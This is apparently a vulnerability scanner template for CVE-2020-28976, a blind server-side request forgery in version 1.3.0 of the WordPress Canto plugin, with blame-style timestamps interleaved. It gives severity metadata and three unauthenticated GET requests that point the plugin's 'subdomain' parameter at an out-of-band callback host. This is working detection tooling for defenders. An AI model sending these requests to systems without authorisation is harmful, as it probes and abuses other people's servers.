2022-02-28 20:45:19 +00:00
id : CVE-2020-28976
info :
name : Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
author : LogicalHunter
severity : medium
description : The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker to make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF.
reference :
- https://www.exploit-db.com/exploits/49189
- https://nvd.nist.gov/vuln/detail/CVE-2020-28976
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.3
2022-02-28 20:45:19 +00:00
cve-id : CVE-2020-28976
cwe-id : CWE-918
tags : cve,cve2020,ssrf,wordpress,wp-plugin,oast
requests :
- method : GET
path :
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}"
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}"
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"
stop-at-first-match : true
matchers :
- type : word
part : interactsh_protocol
words :
- "http"